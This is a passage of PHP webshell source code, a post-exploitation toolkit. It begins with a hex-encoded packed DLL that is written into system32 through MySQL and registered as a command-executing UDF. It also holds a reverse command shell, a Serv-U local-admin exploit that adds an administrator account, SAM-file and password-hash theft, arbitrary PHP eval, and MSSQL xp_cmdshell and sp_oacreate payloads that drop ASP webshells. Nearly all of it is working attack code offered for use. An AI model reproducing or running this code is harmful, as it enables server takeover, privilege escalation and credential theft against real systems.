473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
}

function Mysql_m()
{   
    extract($_POST);
    extract($_GET);
    $mysql_hostname = $mysql_hostname?$mysql_hostname : "127.0.0.1";
    $mysql_username = $mysql_username?$mysql_username : "root";
    $post_sql = $post_sql ? $post_sql : "select state(\"net user\")";
    $mysql_dbname = $mysql_dbname ? $mysql_dbname : "mysql";
    if($install){
	$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
	mysql_select_db($mysql_dbname,$link) or die(mysql_error());
	@mysql_query("DROP TABLE udf_temp", $link);
	$query="CREATE TABLE udf_temp (udf BLOB);";
	if(!($result=mysql_query($query, $link)))
		die('error:create temp table udf_temp error.'.mysql_error());
	else
	{
		$code=get_code();
		$query="INSERT into udf_temp values (CONVERT($code,CHAR));";
		if(!mysql_query($query, $link))
		{
			mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
			die('error:insert DLL error.'.mysql_error());
		}
		else
		{
			$dllname = "mysqlDll.dll";
			if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll";
			elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll"; 
			
			if(file_exists($dir)) {
				$time = time();
				$dir = str_replace("mysqlDll","mysqlDll_$time",$dir);
				$dllname = str_replace("mysqlDll","mysqlDll_$time",$dllname);
			}
			$query = "SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ;
			if(!mysql_query($query, $link))
			{
				die("export dll error:maybe dll is no priv or $dir is exists".mysql_error());
			}
			else
			{
				echo '<font style=font:11pt color=ff0000>install dll success'.$dir.'</font><br>';
			}
		}
		mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
		$result = mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error());
		if($result) {
			echo "install success <br><a href='?'>back</a>";
			exit();
		}
	}
}
?>
<form method="post" action="?s=m"><br><br>  
<div class="actall">Host: <input name="mysql_hostname" value="<?echo $mysql_hostname;?>" type="text"  style="width:100px" >
User: <input name="mysql_username" value="<?echo $mysql_username;?>" type="text"  style="width:70px">
Password: <input type="password" name="mysql_passwd" value="<?echo $mysql_passwd;?>" style="width:70px">
DB: <input name="mysql_dbname" value="<?echo $mysql_dbname;?>" type="text" style="width:70px">
&nbsp;&nbsp;<input class="bt" name="install" type="submit" value="install">
 <br>
<br>
sql statement:<br>
 <textarea name="post_sql" cols="80" rows="10"><?echo stripslashes($post_sql);?>
</textarea>
          <br>  <br>
          <input class="bt" name="" type="submit" value="execute">
        </form><br>back screen:</div>
<?
if ($_POST[post_sql]) {
$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
if($mysql_dbname) mysql_select_db($mysql_dbname,$link) or die(mysql_error());
$query = stripslashes($post_sql);
$result = mysql_query($query, $link)  or die(mysql_error());
?>
<br>
<textarea name="post_sql" style="width:610px;height:180px;">
<?
echo ($result) ? "Done:$result\n\n" : "error:$result\n\n ".mysql_error();
while ($row =  @mysql_fetch_array ($result)) {
print_r ($row);
}
}
?>    
</textarea>
<?

}

//win back connect - php socket

function phpsocket()
{
    @set_time_limit(0);
$system=strtoupper(substr(PHP_OS, 0, 3));
if(!extension_loaded('sockets'))
 {
     if ($system == 'WIN') {
        @dl('php_sockets.dll') or die("Can't load socket");
        }else{
         @dl('sockets.so') or die("Can't load socket");
		}
     
 }

if(isset($_POST['host']) && isset($_POST['port']))
{
	$host = $_POST['host'];
	$port = $_POST['port'];
}else{	
print<<<eof
<html>
<br><br>
<body>
<div class="actall"><h5>reverse cmdshell with php socket;<br>the extension php_sockets should be openned;<br>please check phpinfo();<br>code by <a href=http://www.Wolvez.org><font color=#FF67A0>Maple-X</font></a><br></h5><br></div>
<form method=post action="?s=r">
<div class="actall"><br>Host:<input type=text name=host value="">&nbsp&nbsp
Port:<input type=text name=port value="1120">&nbsp&nbsp<br><br>
<input type="radio" name=info value="linux" checked>Linux
<input type="radio" name=info value="win">Win &nbsp
<input class="bt" type=submit name=submit value="connect">
</form>
</body>
</html>
eof;
echo '<br><br>';
}
if($system=="WIN")
{
	$env=array('path' => 'c:\\windows\\system32');
}else{
	$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
}
$descriptorspec = array(
		0 => array("pipe","r"),
		1 => array("pipe","w"),
		2 => array("pipe","w"),
		);
$host=gethostbyname($host);
$proto=getprotobyname("tcp");
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0)
{
	die("Socket Create Faile");
}
if(($ret=socket_connect($sock,$host,$port))<0)
{
	die("Connect Faile");
}else{
$message="----------------------PHP Connect-Back--------------------\n";
socket_write($sock,$message,strlen($message));
$cwd=str_replace('\\','/',dirname(__FILE__));
while($cmd=socket_read($sock,65535,$proto))
	{
	if(trim(strtolower($cmd))=="exit")
	{
	socket_write($sock,"Bye Bye\n");
	exit;
	}else{
		
$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
    fwrite($pipes[0], $cmd);
    fclose($pipes[0]);
	
	$msg=stream_get_contents($pipes[1]);
    socket_write($sock,$msg,strlen($msg));
    fclose($pipes[1]);

	$msg=stream_get_contents($pipes[2]);
	socket_write($sock,$msg,strlen($msg));
    $return_value = proc_close($process);
}
	}
}
}
    
    }
//serv-u
function su()
{
	$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
print<<<END
<div class="actall"><a href="?s=z">[Exec Command]</a> <a href="?s=z&o=adduser">[Add User]</a></div>
<form method="POST">
	<div class="actall">SU_Port <input name="SUPort" type="text" value="43958" style="width:300px"></div>
	<div class="actall">SU_User <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
	<div class="actall">SU_Pass <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
END;
if($_GET['o'] == 'adduser')
{
print<<<END
<div class="actall">Username <input name="user" type="text" value="spider" style="width:100px">
Password <input name="password" type="text" value="spider" style="width:100px">
Directory <input name="part" type="text" value="C:\\\\" style="width:150px"></div>
END;
}
else
{
print<<<END
<div class="actall">Command <input name="SUCommand" type="text" value="net user b4che10r 123456 /add & net localgroup administrators b4che10r /add" style="width:600px"><br>
<input name="user" type="hidden" value="b4che10r">
<input name="password" type="hidden" value="123456">
<input name="part" type="hidden" value="C:\\\\"></div>
END;
}
echo '<div class="actall"><input class="bt" type="submit" value="Exec" style="width:80px;"></div></form>';
	if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
	{
		echo '<div class="actall">';
		$sendbuf = "";
		$recvbuf = "";
		$domain  = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
		$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
							 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
							 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
		$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
		$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);
		$recvbuf = @fgets($sock, 1024);
		echo "Data receive: $recvbuf <br>";
		$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
		@fputs($sock, $sendbuf, strlen($sendbuf));
		echo "Data send: $sendbuf <br>";
		$recvbuf = @fgets($sock, 1024);
		echo "Data receive: $recvbuf <br>";
		$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
		@fputs($sock, $sendbuf, strlen($sendbuf));
		echo "Data send: $sendbuf <br>";
		$recvbuf = @fgets($sock, 1024);
		echo "Data receive: $recvbuf <br>";
		$sendbuf = "SITE MAINTENANCE\r\n";
		@fputs($sock, $sendbuf, strlen($sendbuf));
		echo "Data send: $sendbuf <br>";
		$recvbuf = @fgets($sock, 1024);
		echo "Data receive: $recvbuf <br>";
		$sendbuf = $domain;
		@fputs($sock, $sendbuf, strlen($sendbuf));
		echo "Data send: $sendbuf <br>";
		$recvbuf = @fgets($sock, 1024);
		echo "Data receive: $recvbuf <br>";
		$sendbuf = $adduser;
		@fputs($sock, $sendbuf, strlen($sendbuf));
		echo "Data send: $sendbuf <br>";
		$recvbuf = @fgets($sock, 1024);
		echo "Data receive: $recvbuf <br>";
		if(!empty($_POST['SUCommand']))
		{
	 		$exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10);
	 		$recvbuf = @fgets($exp, 1024);
	 		echo "Data receive: $recvbuf <br>";
	 		$sendbuf = "USER ".$_POST['user']."\r\n";
	 		@fputs($exp, $sendbuf, strlen($sendbuf));
	 		echo "Data send: $sendbuf <br>";
	 		$recvbuf = @fgets($exp, 1024);
	 		echo "Data receive: $recvbuf <br>";
	 		$sendbuf = "PASS ".$_POST['password']."\r\n";
	 		@fputs($exp, $sendbuf, strlen($sendbuf));
	 		echo "Data send: $sendbuf <br>";
	 		$recvbuf = @fgets($exp, 1024);
	 		echo "Data receive: $recvbuf <br>";
	 		$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
	 		@fputs($exp, $sendbuf, strlen($sendbuf));
	 		echo "Data send: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
	 		$recvbuf = @fgets($exp, 1024);
	 		echo "Data receive: $recvbuf <br>";
	 		$sendbuf = $deldomain;
	 		@fputs($sock, $sendbuf, strlen($sendbuf));
	 		echo "Data send: $sendbuf <br>";
	 		$recvbuf = @fgets($sock, 1024);
	 		echo "Data receive: $recvbuf <br>";
	 		@fclose($exp);
		}
		@fclose($sock);
		echo '</div>';
	}
}

//mysql statement

function Mysql_n()
{
	$MSG_BOX = ' ';
	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
	if(isset($_POST['mhost']) && isset($_POST['muser']))
	{
		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
		if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
		else $MSG_BOX = 'Connect to mysql faild ';
	}
	$downfile = 'c:/windows/repair/sam';
	if(!empty($_POST['downfile']))
	{
		$downfile = File_Str($_POST['downfile']);
		$binpath = bin2hex($downfile);
		$query = 'select load_file(0x'.$binpath.')';
		if($result = @mysql_query($query,$conn))
		{
			$k = 0; $downcode = '';
			while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
			$filedown = basename($downfile);
			if(!$filedown) $filedown = 'b4che10r.tmp';
			$array = explode('.', $filedown);
			$arrayend = array_pop($array);
			header('Content-type: application/x-'.$arrayend);
			header('Content-Disposition: attachment; filename='.$filedown);
			header('Content-Length: '.strlen($downcode));
			echo $downcode;
			exit;
		}
		else $MSG_BOX = 'Download file faild';
	}
	$o = isset($_GET['o']) ? $_GET['o'] : '';
	Root_CSS();
print<<<END
<form method="POST" name="nform" id="nform" action="?s=n&o={$o}" enctype="multipart/form-data">
<center><div class="actall"><a href="?s=n">[execute Mysql statement]</a> 
<a href="?s=n&o=u">[Mysql upfile]</a> 
<a href="?s=n&o=d">[Mysql download file]</a></div>
<div class="actall">
IP: <input type="text" name="mhost" value="{$mhost}" style="width:110px">
Port: <input type="text" name="mport" value="{$mport}" style="width:110px">
User: <input type="text" name="muser" value="{$muser}" style="width:110px">
Pass: <input type="text" name="mpass" value="{$mpass}" style="width:110px">
Dbname: <input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div>
<div class="actall" style="height:220px;">
END;
if($o == 'u')
{
	$uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/��/exp.vbs';
	if(!empty($_POST['uppath']))
	{
		$uppath = $_POST['uppath'];
		$query = 'Create TABLE a (cmd text NOT NULL);';
		if(@mysql_query($query,$conn))
		{
			if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
			else{$tmp = File_Str(dirname(__FILE__)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
			$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
			if(@mysql_query($query,$conn))
			{
				$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
				$MSG_BOX = @mysql_query($query,$conn) ? 'upfile success' : 'upfile faild';
			}
			else $MSG_BOX = 'insert into temp table faild';
			@mysql_query('Drop TABLE IF EXISTS a;',$conn);
		}
		else $MSG_BOX = 'create temp table faild';
	}
print<<<END
<br><br>Path: <input type="text" name="uppath" value="{$uppath}" style="width:500px">
<br><br>File:&nbsp <input type="file" name="upfile" style="width:500px;height:22px;">
</div><div class="actall"><input class="bt" type="submit" value="upfile">
END;
}
elseif($o == 'd')
{
print<<<END
<br><br><br>download file: <input type="text" name="downfile" value="{$downfile}" style="width:500px">
</div><div class="actall"><input class="bt" type="submit" value="Download">
END;
}
else
{
print<<<END
<script language="javascript">
function nFull(i){
	Str = new Array(15);
        Str[0] = "select command  Or input manual";
	Str[1] = "select version();";
        Str[2] = "select @@character_set_database;";
        Str[3] = "show databases;";
        Str[4] = "show tables;";
        Str[5] = "show columns from table_name;";
        Str[6] = "select @@hostname;";
        Str[7] = "select @@version_compile_os;";
        Str[8] = "select @@basedir;";
        Str[9] = "select @@datadir;";
        Str[10] = "describe table_name;";
        Str[11] = "select User,Password from mysql.user;";
	Str[12] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);";
	Str[13] = "select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;";
	Str[14] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
	nform.msql.value = Str[i];
	return true;
}
</script>
<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
<div class="actall">
<select onchange="return nFull(options[selectedIndex].value)">
        <option value="0" selected>command</option>
	<option value="1">version</option>
        <option value="2">charset</option>
        <option value="3">databases</option>
        <option value="4">tables</option>
        <option value="5">columns</option>
        <option value="6">hostname</option>
        <option value="7">version_compile_os</option>
        <option value="8">basedir</option>
        <option value="9">datadir</option>
        <option value="10">describe</option>
        <option value="11">hashes</option>
	<option value="12">load_file</option>
	<option value="13">into dumpfile</option>
	<option value="14">skip_network</option>
</select>
<input class="bt" type="submit" value="execute">
END;
if(!empty($_POST['msql']))

     	{
		$msql = $_POST['msql'];
		if($result = @mysql_query($msql,$conn))
		{
			$MSG_BOX = 'execute sql statement success<br>';
                        $row=mysql_fetch_row($result);
                        echo '<table border="1" cellpadding="1" cellspacing="2">'."<tr>";
                        for ($i=0; $i<mysql_num_fields($result); $i++)
                        {
                          echo '<td><b>'.mysql_field_name($result, $i)."</b></td>";
                         }
                       echo "</tr>";
                       mysql_data_seek($result, 0);
                       while ($row=mysql_fetch_row($result))
                       {
                        echo "<tr>";
                        for ($i=0; $i<mysql_num_fields($result); $i++ )
                        {
                           echo '<td>'."$row[$i]".'</td>';
                        }
                        echo "</tr>";
                      }
                      echo "</table>";
                     mysql_free_result($result); 
		}
		else $MSG_BOX .= mysql_error();
	}
}
	echo '<br>'.$MSG_BOX.'</div></center></form>';
	return true;
}

//eval php code
function phpcode()
{
         
print<<<END
<html>
<br />
<div class="actall"><h5>user define php code:<h5><br></div>
<form action="?s=x" method="POST">
<div class="actall"><textarea name="phpcode" rows="20" cols="80">print_r(apache_get_modules());/*get apache modules which have openned*/</textarea></div><br />
<div><input class="bt" type="submit" value="EVAL"></div></form>
</html>
END;
         $phpcode = $_POST['phpcode'];
         $phpcode = trim($phpcode);
         if($phpcode){
             if (!preg_match('#<\?#si',$phpcode)){
             $phpcode = "<?php\n\n{$phpcode}\n\n?>";
           }
          eval("?".">$phpcode<?");
          echo '<br><br>';
          }
     return false;
}
//other db connector
function otherdb(){
$db = isset($_GET['db']) ? $_GET['db'] : '';
print<<<END
<form method="POST" name="dbform" id="dbform" action="?s=w&db={$db}" enctype="multipart/form-data">
<div class="actall"><a href="?s=w"> &nbsp psotgresql &nbsp</a> 
<a href="?s=w&db=ms"> &nbsp mssql &nbsp</a> 
<a href="?s=w&db=ora"> &nbsp oracle &nbsp</a>
<a href="?s=w&db=ifx"> &nbsp informix &nbsp</a>
<a href="?s=w&db=fb"> &nbsp  firebird &nbsp</a>
<a href="?s=w&db=db2">&nbsp db2 &nbsp</a></div></form>
END;

if ($db=="ms"){
$mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa';
$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : 'sa123';
$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
$msaction = isset($_POST['action']) ? $_POST['action'] : '';
$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
$msquery = stripslashes($msquery);
print<<<END
<form method="POST" name="msform" action="?s=w&db=ms">
<div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br><br>
<script language="javascript">
function msFull(i){
	Str = new Array(11);
        Str[0] = "";
	Str[1] = "select @@version;";
        Str[2] = "select name from sysdatabases;";
        Str[3] = "select name from sysobject where type='U';";
        Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
        Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
	Str[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
	Str[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
        Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
        Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
        Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
        Str[11] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
	Str[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
        msform.mssql.value = Str[i];
	return true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
	<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">add sp_oacreate</option>
	<option value="6">add xp_cmdshell</option>
	<option value="7">add xp_cmdshell(2005)</option>
        <option value="8">add sp_oacreate(2005)</option>
        <option value="9">open openrowset(2005)</option>
        <option value="10">xp_cmdshell exec</option>
        <option value="10">sp_oamethod exec</option>
        <option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></div></form>
END;

if ($msaction == 'msquery'){
$msconn= mssql_connect ($mshost , $msuser, $mspass);  
mssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message());
$msresult = mssql_query($msquery) or die(mssql_get_last_message());
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i=0; $i<mssql_num_fields($msresult); $i++)
{
echo '<td bgcolor="#228B22"><b>'.
mssql_field_name($msresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
mssql_data_seek($result, 0);
while ($msrow=mssql_fetch_row($msresult))
{
echo "<tr>\n";
for ($i=0; $i<mssql_num_fields($msresult); $i++ )
{
echo '<td bgcolor="#B8B8E8">';
echo "$msrow[$i]";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
mssql_free_result($msresult);
mssql_close();
}
    }
elseif ($db=="ora"){
$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root';
$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456';
$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
$oraquery = stripslashes($oraquery);
print<<<END
<form method="POST" name="oraform" action="?s=w&db=ora">
<div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br>
<script language="javascript">
function oraFull(i){
	Str = new Array(8);
        Str[0] = ""; 
	Str[1] = "select version();";
        Str[2] = "show databases;";
        Str[3] = "show tables from db_name;";
        Str[4] = "show columns from table_name;";
        Str[5] = "select user,password from mysql.user;";
	Str[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);";
	Str[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'";
	oraform.orasql.value = Str[i];
	return true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
	<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">hashes</option>
	<option value="6">load_file</option>
	<option value="7">into outfile</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;

if ($oraaction == 'oraquery'){
    $oralink = OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror()); 
    $oraresult=ociparse($oralink,$oraquery) or die(ocierror());
    $orarow=oci_fetch_row($oraresult);
    echo '<font face="verdana">';
    echo '<table border="1" cellpadding="1" cellspacing="2">';
    echo "\n<tr>\n";
    for ($i=0; $i<oci_num_fields($oraresult); $i++)
    {
    echo '<td bgcolor="#228B22"><b>'.
    oci_field_name($oraresult, $i);
    echo "</b></td>\n";
    }
    echo "</tr>\n";
    ociresult($oraresult, 0);
    while ($orarow=ora_fetch_row($oraresult))
    {
    echo "<tr>\n";
    for ($i=0; $i<ora_num_fields($result); $i++ )
    {
    echo '<td bgcolor="#B8B8E8">';
    echo "$orarow[$i]";
    echo '</td>';
    }
    echo "</tr>\n";
    }
    echo "</table>\n";
    echo "</font>";
    oci_free_statement($oraresult);
    ocilogoff();
}
}
elseif ($db == "ifx"){
$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root';
$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456';
$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
$ifxquery = stripslashes($ifxquery);
print<<<END
<form method="POST" name="ifxform" action="?s=w&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br>
<script language="javascript">
function ifxFull(i){
	Str = new Array(11);
        Str[0] = "";
	Str[1] = "select dbservername from sysobjects;";
        Str[2] = "select name from sysdatabases;";
        Str[3] = "select tabname from systables;";
        Str[4] = "select colname from syscolumns where tabid=n;";
        Str[5] = "select username,usertype,password from sysusers;";
	ifxform.ifxsql.value = Str[i];
	return true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
